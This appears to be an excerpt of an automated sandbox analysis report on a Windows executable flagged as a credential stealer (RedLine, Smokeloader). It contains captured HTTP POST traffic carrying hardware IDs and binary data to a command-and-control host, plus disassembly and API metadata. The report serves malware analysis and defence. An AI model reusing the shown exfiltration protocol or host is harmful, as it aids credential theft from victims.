4823jn0KXrKpAuGv13rYk6M3bimr1aGKq9Fnn2UOoIzwSOMMephZoyvRY+1G7MnAc2St77uCssKoF+Gf9UDjTXCKJ5+/Sd8xLpHwetdvS9Kj9W5p61SgSChQpp8lzuPMMQphTXtZmKMvkeEvh7zbAGEyvD+7neFLb9Z0EGUOIA82m+XcPspYoj9E8G5GrQmTInRtKKjXYInp1qYeJkkgzHJIYQ77WlkhbNBivNT8yVZw4rwiaNCmSSlWdBBlD
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 62 36 63 39 39 47 4d 6c 6d 2f 4e 53 77 62 51 52 38 33 6f 42 69 64 36 30 70 61 4a 62 68 79 4f 76 54 4a 56 35 6b 7a 61 49 50 63 6b 75 67 7a 62 75 5a 6d 2b 49 75 55 65 49 74 52 47 77 49 55 66 44 6e 50 43 68 74 68 4c 54 62 6f 39 46 6d 58 69 58 4e 5a 38 38 6a 47 48 49 4d 4f 52 70 4a 64 79 72 57 35 61 30 41 76 30 37 41 59 54 65 38 50 37 75 57 4a 6b 72 6f 45 79 59 63 5a 4d 36 68 44 76 4a 50 59 41 34 35 57 56 74 67 62 4a 4e 68 4c 34 61 75 43 46 54 6b 64 47 30 71 4b 49 53 78 57 36 70 55 4e 49 73 31 78 4f 5a 4f 4e 77 70 69 33 37 39 4a 33 7a 45 75 6b 66 42 36 31 32 7a 4c 45 32 49 31 62 75 74 71 6c 61 4c 49 36 56 47 6e 48 32 62 50 6f 49 38 33 69 4b 4e 4e 75 68 67 59 49 69 77 53 4a 4f 77 48 50 4e 73 41 59 54 4b 38 50 37 75 64 62 67 5a 6a 51 69 4e 4f 6f 35 32 69 54 65 Data Ascii: b6c99GMlm/NSwbQR83oBid60paJbhyOvTJV5kzaIPckugzbuZm+IuUeItRGwIUfDnPChthLTbo9FmXiXNZ88jGHIMORpJdyrW5a0Av07AYTe8P7uWJkroEyYcZM6hDvJPYA45WVtgbJNhL4auCFTkdG0qKISxW6pUNIs1xOZONwpi379J3zEukfB612zLE2I1butqlaLI6VGnH2bPoI83iKNNuhgYIiwSJOwHPNsAYTK8P7udbgZjQiNOo52iTe
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 75 46 6d 62 73 53 69 42 5a 6a 7a 47 72 39 69 47 63 50 56 75 4b 36 67 55 59 30 6c 6f 6b 53 54 66 5a 45 7a 68 6a 7a 44 4b 49 45 35 34 6d 39 33 67 37 42 43 67 62 67 55 75 53 5a 41 69 4a 4c 2b 35 71 6c 4b 79 33 62 75 65 70 56 69 68 7a 58 4f 4a 49 49 32 79 44 6e 75 4b 54 33 45 73 46 6d 41 74 67 2b 33 4c 55 71 52 32 62 61 6d 71 30 43 4d 49 71 52 48 6b 58 79 61 4e 59 59 70 7a 43 4b 49 4c 50 42 76 62 6f 72 39 42 63 47 30 42 66 4e 36 41 62 4c 46 75 2b 61 78 48 4a 4a 75 71 55 54 53 4c 4e 63 31 68 44 62 43 50 59 77 34 36 57 70 72 6a 4c 68 44 68 62 6b 51 76 43 6c 4c 69 74 71 77 71 61 74 61 67 43 69 67 53 5a 52 34 6d 6e 62 41 65 38 73 33 79 47 61 69 54 6e 2b 4a 75 31 79 51 68 68 71 7a 63 77 47 63 6e 4b 6e 6d 71 56 37 4c 64 75 35 46 6e 6e 36 61 4d 34 6f 7a 79 79 79 4a Data Ascii: uFmbsSiBZjzGr9iGcPVuK6gUY0lokSTfZEzhjzDKIE54m93g7BCgbgUuSZAiJL+5qlKy3buepVihzXOJII2yDnuKT3EsFmAtg+3LUqR2bamq0CMIqRHkXyaNYYpzCKILPBvbor9BcG0BfN6AbLFu+axHJJuqUTSLNc1hDbCPYw46WprjLhDhbkQvClLitqwqatagCigSZR4mnbAe8s3yGaiTn+Ju1yQhhqzcwGcnKnmqV7Ldu5Fnn6aM4ozyyyJ
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 4b 49 2f 52 50 42 76 52 43 31 49 30 43 4c 32 72 43 67 70 46 61 49 4a 36 31 50 6d 33 4b 63 4e 59 51 30 79 79 6d 4d 50 75 6c 75 61 34 4b 34 51 49 6a 7a 55 2f 4d 6c 57 63 4f 4b 38 49 43 4e 51 4a 6b 63 6f 45 75 4a 4e 49 68 34 6c 33 76 4c 49 38 68 6d 6f 6d 4a 74 69 36 39 4f 69 4c 73 5a 75 69 4a 46 69 64 2b 33 70 71 74 66 6a 69 71 67 54 4a 56 30 6d 7a 6d 4a 4d 38 4d 72 69 44 47 69 4a 79 57 44 70 51 76 5a 38 7a 32 34 4e 47 43 4e 32 61 4c 6d 73 52 79 53 62 71 6c 45 30 69 7a 58 4f 49 63 36 78 43 47 45 4e 75 5a 37 5a 59 2b 30 52 49 43 38 48 62 41 6a 53 34 76 41 74 71 61 6c 57 6f 77 6d 71 6b 61 41 64 5a 68 32 77 48 76 4c 4e 38 68 6d 6f 6c 68 7a 67 37 70 45 77 35 6f 61 71 43 4e 4c 67 4e 6d 38 35 72 45 63 6b 6d 36 70 52 4e 49 73 31 7a 75 43 4e 73 67 39 68 44 37 69 59 Data Ascii: KI/RPBvRC1I0CL2rCgpFaIJ61Pm3KcNYQ0yymMPulua4K4QIjzU/MlWcOK8ICNQJkcoEuJNIh4l3vLI8hmomJti69OiLsZuiJFid+3pqtfjiqgTJV0mzmJM8MriDGiJyWDpQvZ8z24NGCN2aLmsRySbqlE0izXOIc6xCGENuZ7ZY+0RIC8HbAjS4vAtqalWowmqkaAdZh2wHvLN8hmolhzg7pEw5oaqCNLgNm85rEckm6pRNIs1zuCNsg9hD7iY
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 41 6a 37 59 63 76 79 68 47 6a 63 43 78 72 4b 4a 54 6a 43 6d 6c 57 70 6c 6d 6e 44 36 4e 4e 63 51 6d 69 44 44 69 61 47 69 45 2f 51 58 42 74 41 58 7a 65 67 47 6d 38 61 65 77 70 42 43 6f 4f 62 68 43 6c 58 69 42 50 59 38 34 32 69 4b 59 66 71 77 70 64 49 4f 73 43 39 6d 6c 44 61 51 6c 58 73 33 4c 38 4b 47 69 45 74 4e 75 70 55 65 63 65 5a 77 79 68 7a 37 45 4c 49 30 37 36 47 56 70 68 62 56 43 69 37 59 59 74 53 68 43 6a 64 32 78 71 71 70 62 68 53 66 75 42 74 4a 7a 6a 33 62 57 65 2f 6f 2f 6a 79 62 76 65 53 65 32 76 6c 71 51 70 68 43 6a 4a 41 4f 73 30 62 79 6c 71 31 57 62 62 72 45 47 69 7a 53 51 4f 73 35 6a 6a 43 2b 4d 4d 75 46 75 61 34 75 77 52 49 61 34 45 72 6b 73 55 34 7a 58 75 4b 71 6d 58 35 6b 6b 70 46 71 62 66 5a 6f 34 68 69 6e 50 62 38 5a 2b 35 58 45 6c 33 50 Data Ascii: Aj7YcvyhGjcCxrKJTjCmlWplmnD6NNcQmiDDiaGiE/QXBtAXzegGm8aewpBCoObhClXiBPY842iKYfqwpdIOsC9mlDaQlXs3L8KGiEtNupUeceZwyhz7ELI076GVphbVCi7YYtShCjd2xqqpbhSfuBtJzj3bWe/o/jybveSe2vlqQphCjJAOs0bylq1WbbrEGizSQOs5jjC+MMuFua4uwRIa4ErksU4zXuKqmX5kkpFqbfZo4hinPb8Z+5XEl3P
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 49 35 4d 70 56 34 4c 66 75 36 71 51 62 4a 34 74 6f 45 61 56 59 6f 5a 32 77 48 76 44 62 39 41 48 6f 69 45 6c 75 2f 4d 4c 6d 66 4e 46 38 78 64 43 6a 64 79 33 73 4c 38 66 71 79 57 34 53 5a 39 2f 6d 33 53 50 4e 74 77 6f 79 48 43 69 62 79 58 63 37 51 58 42 74 77 7a 7a 65 68 48 52 69 65 58 31 2b 51 4c 5a 4d 65 42 52 30 6d 4c 58 62 74 78 31 6a 44 33 49 5a 71 49 75 5a 70 61 76 54 59 4b 6c 48 76 51 63 66 36 50 5a 76 4b 57 69 55 34 78 75 34 41 69 64 4e 4d 38 50 7a 6a 6a 65 50 63 63 76 39 47 52 31 67 2f 46 44 6b 4c 34 52 38 32 77 42 7a 39 61 37 71 71 74 56 6d 32 47 38 57 4a 6c 34 67 58 71 4b 4b 59 78 68 79 43 2f 70 5a 6e 65 4b 75 67 53 51 70 52 43 6a 49 55 53 45 6e 72 69 33 6f 31 37 4c 59 4f 35 64 6d 58 69 52 4f 35 74 30 33 54 6d 4c 4b 4f 55 6c 62 5a 57 77 52 38 47 Data Ascii: I5MpV4Lfu6qQbJ4toEaVYoZ2wHvDb9AHoiElu/MLmfNF8xdCjdy3sL8fqyW4SZ9/m3SPNtwoyHCibyXc7QXBtwzzehHRieX1+QLZMeBR0mLXbtx1jD3IZqIuZpavTYKlHvQcf6PZvKWiU4xu4AidNM8PzjjePccv9GR1g/FDkL4R82wBz9a7qqtVm2G8WJl4gXqKKYxhyC/pZneKugSQpRCjIUSEnri3o17LYO5dmXiRO5t03TmLKOUlbZWwR8G
2025-01-04 14:33:19 UTC	1369	IN	Data Raw: 67 48 62 6b 6f 57 6c 6f 46 79 4d 4f 4c 38 46 74 48 65 51 4d 49 30 31 32 7a 37 49 63 4b 4a 76 4a 64 7a 76 42 63 47 33 44 50 4e 36 45 64 47 4a 35 66 58 35 41 74 6b 78 34 46 48 53 59 74 64 75 33 58 57 4d 50 63 68 6d 6f 69 35 72 69 62 78 49 6a 37 41 50 6f 53 52 43 6c 64 48 33 6d 4a 42 33 68 69 4f 72 52 70 56 4b 71 52 65 45 4b 38 45 67 6a 77 44 63 58 6e 53 44 72 51 6d 6e 73 41 75 77 59 67 2f 44 79 76 44 2b 37 6e 4f 42 50 71 4e 48 6c 54 54 5a 64 6f 70 37 6c 47 2b 74 4d 2b 39 73 61 34 50 2f 61 6f 75 6a 45 4c 77 6c 41 63 32 53 76 4f 62 32 45 6f 6f 6b 76 6b 57 64 63 39 73 78 6c 44 79 4d 59 63 67 77 6f 6a 45 6c 68 62 64 62 6a 4c 77 61 2f 79 52 50 6a 5a 4b 76 36 4c 63 53 6e 57 37 32 47 39 77 30 68 58 62 57 65 34 73 68 68 54 2f 68 5a 32 61 57 72 30 32 43 70 52 37 30 Data Ascii: gHbkoWloFyMOL8FtHeQMI012z7IcKJvJdzvBcG3DPN6EdGJ5fX5Atkx4FHSYtdu3XWMPchmoi5ribxIj7APoSRCldH3mJB3hiOrRpVKqReEK8EgjwDcXnSDrQmnsAuwYg/DyvD+7nOBPqNHlTTZdop7lG+tM+9sa4P/aoujELwlAc2SvOb2EookvkWdc9sxlDyMYcgwojElhbdbjLwa/yRPjZKv6LcSnW72G9w0hXbWe4shhT/hZ2aWr02CpR70

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.7	49732	104.21.64.1	443	7336	C:\Users\user\Desktop\SOElePqvtf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:20 UTC	273	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=WALCCX02K User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 12785 Host: cloudewahsj.shop
2025-01-04 14:33:20 UTC	12785	OUT	Data Raw: 2d 2d 57 41 4c 43 43 58 30 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 33 35 46 32 39 43 43 44 39 36 43 43 34 38 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 57 41 4c 43 43 58 30 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 57 41 4c 43 43 58 30 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 57 41 4c 43 43 58 30 32 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 Data Ascii: --WALCCX02KContent-Disposition: form-data; name="hwid"0335F29CCD96CC48822D1F4978021086--WALCCX02KContent-Disposition: form-data; name="pid"2--WALCCX02KContent-Disposition: form-data; name="lid"4h5VfH----WALCCX02KContent-Dispositi
2025-01-04 14:33:20 UTC	1128	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:20 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ifr43v74vgma75skc1rqjruq9o; expires=Wed, 30 Apr 2025 08:19:59 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zKEUiFazeszYbIKz4ziuwDtnO4NrCoOi%2F6xdtZh7VuggCoMgOS979O6Apy15819kyit91jTAgtL9f%2BpBnbzL3%2BhURGvJrz4cU4sSDXLSrYbPgHundqgp83blPchcJ%2Bnx1s6B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf16f0c0bde95-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=43299&min_rtt=40814&rtt_var=17080&sent=8&recv=17&lost=0&retrans=0&sent_bytes=2836&recv_bytes=13716&delivery_rate=71544&cwnd=242&unsent_bytes=0&cid=4d40c3bee15742d4&ts=620&x=0"
2025-01-04 14:33:20 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:20 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.7	49738	104.21.64.1	443	7336	C:\Users\user\Desktop\SOElePqvtf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:21 UTC	282	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=Y54Q85KT7OQETH72FU User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 15071 Host: cloudewahsj.shop
2025-01-04 14:33:21 UTC	15071	OUT	Data Raw: 2d 2d 59 35 34 51 38 35 4b 54 37 4f 51 45 54 48 37 32 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 33 35 46 32 39 43 43 44 39 36 43 43 34 38 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 59 35 34 51 38 35 4b 54 37 4f 51 45 54 48 37 32 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 59 35 34 51 38 35 4b 54 37 4f 51 45 54 48 37 32 46 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 59 Data Ascii: --Y54Q85KT7OQETH72FUContent-Disposition: form-data; name="hwid"0335F29CCD96CC48822D1F4978021086--Y54Q85KT7OQETH72FUContent-Disposition: form-data; name="pid"2--Y54Q85KT7OQETH72FUContent-Disposition: form-data; name="lid"4h5VfH----Y
2025-01-04 14:33:22 UTC	1130	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:22 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=erslgnjlnqt8i42b3p00da99cb; expires=Wed, 30 Apr 2025 08:20:01 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8PHOEPQCyxcPgmJxLRHVW3TBEqUHitnG%2FFxCrSTA%2FuhF4R%2BK3dkl%2BEs%2BKKUWWtecBSOXy0vgv2FRLocC7fj6F56ei9QhNCRYPsbSjC4qt1seuUWaBnw6xd%2F8navgLoPIV93y"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1761c434414-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1617&rtt_var=620&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2837&recv_bytes=16011&delivery_rate=1746411&cwnd=172&unsent_bytes=0&cid=d7697e027cbb5901&ts=831&x=0"
2025-01-04 14:33:22 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.7	49752	104.21.64.1	443	7336	C:\Users\user\Desktop\SOElePqvtf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 14:33:23 UTC	275	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=1U554ERFNUH User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 20354 Host: cloudewahsj.shop
2025-01-04 14:33:23 UTC	15331	OUT	Data Raw: 2d 2d 31 55 35 35 34 45 52 46 4e 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 33 33 35 46 32 39 43 43 44 39 36 43 43 34 38 38 32 32 44 31 46 34 39 37 38 30 32 31 30 38 36 0d 0a 2d 2d 31 55 35 35 34 45 52 46 4e 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 31 55 35 35 34 45 52 46 4e 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 31 55 35 35 34 45 52 46 4e 55 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --1U554ERFNUHContent-Disposition: form-data; name="hwid"0335F29CCD96CC48822D1F4978021086--1U554ERFNUHContent-Disposition: form-data; name="pid"3--1U554ERFNUHContent-Disposition: form-data; name="lid"4h5VfH----1U554ERFNUHContent-D
2025-01-04 14:33:23 UTC	5023	OUT	Data Raw: 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
2025-01-04 14:33:23 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 14:33:23 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=msl8obn2d7691hklinf74kkat5; expires=Wed, 30 Apr 2025 08:20:02 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tuamXrWM2HEflhK3V2UEVP1Jx0328cgiXuXnftq3t3w3rtMQLUAVzAah4VZ5%2FHwiL7VRhkFgvOgoFobp3%2BHDc7gL6k%2Fw20MNUh3Trh%2BNXqHbfOvfIEOYMUCw2iloVl39HM%2Fu"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fcbf1802ece42e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1712&min_rtt=1706&rtt_var=653&sent=11&recv=26&lost=0&retrans=0&sent_bytes=2836&recv_bytes=21309&delivery_rate=1658148&cwnd=240&unsent_bytes=0&cid=e762e987f27260a8&ts=517&x=0"
2025-01-04 14:33:23 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 14:33:23 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	09:33:14
Start date:	04/01/2025
Path:	C:\Users\user\Desktop\SOElePqvtf.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\SOElePqvtf.exe"
Imagebase:	0x400000
File size:	321'536 bytes
MD5 hash:	B2981D605F25A4617F31B78996DE3F78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1585486653.000000000064C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1585816079.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1585442672.0000000000510000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	09:33:23
Start date:	04/01/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1816
Imagebase:	0x2d0000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.7%
Dynamic/Decrypted Code Coverage:	22.5%
Signature Coverage:	50.4%
Total number of Nodes:	129
Total number of Limit Nodes:	10

Executed Functions

Function 0043D0D0 Relevance: 32.5, APIs: 11, Strings: 7, Instructions: 957
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(80838290,00000000,00000001,?,00000000), ref: 0043D572
SysAllocString.OLEAUT32 ref: 0043D608
CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D646
SysAllocString.OLEAUT32 ref: 0043D6A8
SysAllocString.OLEAUT32 ref: 0043D765
VariantInit.OLEAUT32(?), ref: 0043D7D6
SysFreeString.OLEAUT32(00000000), ref: 0043DB5D
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043DB95

Strings

{pqv, xrefs: 0043D120
[J, xrefs: 0043D21D
[B, xrefs: 0043D225
yv, xrefs: 0043D813
CfF, xrefs: 0043D600
fF, xrefs: 0043D5D0
tu, xrefs: 0043D5AC

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: String$Alloc$BlanketCreateFreeInformationInitInstanceProxyVariantVolume
String ID: fF$CfF$[B$[J$tu$yv${pqv
API String ID: 505850577-1972840126
Opcode ID: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
Instruction ID: dd13a90e2492ac68040bcad17eea3e7c9d23fbfdc89757e028f71a1dea91b727
Opcode Fuzzy Hash: 0933b6900e20eb3ffd80477a97ad3530cb39ed5c2e1d64840ee4302b7984fe47
Instruction Fuzzy Hash: 94621372A183108FE314CF68D88576BBBE1EFD5314F198A2DE4D58B390D7799809CB86

Function 00408A60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 216
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcessId.KERNEL32 ref: 00408A84
GetCurrentThreadId.KERNEL32 ref: 00408A8E
SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00408B76
GetForegroundWindow.USER32 ref: 00408B8B
ExitProcess.KERNEL32 ref: 00408D07

Strings

1[, xrefs: 00408C2A, 00408CEE

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
String ID: 1[
API String ID: 4063528623-4259844156
Opcode ID: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction ID: 695b1043c619777a8863990e744e8888075fa37916c6100b3e536846f602c71f
Opcode Fuzzy Hash: ba99a32a84df6074fc1a326d170a01607909a1aa19cc5cd935f515b9d2d4cca7
Instruction Fuzzy Hash: E3616873B143140BD318AE799C1635AB6D39BC5314F0F863EA995EB7D1ED7888068389

Function 00421B30 Relevance: 9.3, Strings: 7, Instructions: 527
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

v, xrefs: 00422159
p, xrefs: 00422161
!@, xrefs: 00421B6A
q, xrefs: 00422169
0, xrefs: 00421DF2
,, xrefs: 00422090
6, xrefs: 00421E02

Memory Dump Source

Source File: 00000000.00000002.1585209653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1585209653.0000000000457000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SOElePqvtf.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$0$6$p$q$v
API String ID: 1279760036-585546663
Opcode ID: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction ID: 8656d014051cfeae6f38fc6e5bc27d53fcdcc23dc9b32e8d9396b3c6709607b7
Opcode Fuzzy Hash: 68ded5a1127ff787cf997603004e9156167bbfc9199ee1ec6ad3b0f1b8bf95cb
Instruction Fuzzy Hash: 0122DD7170C790CFD3248B28D58036BBBE1BB95324F558A2EE5E9873D1D7B988418B4B

Function 0040C080 Relevance: 6.4, Strings: 5, Instructions: 104
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

'!, xrefs: 0040C119
50, xrefs: 0040C1AD
Js, xrefs: 0040C0C1
DM_e, xrefs: 0040C083
FwPq, xrefs: 0040C0B9

Memory Dump Source

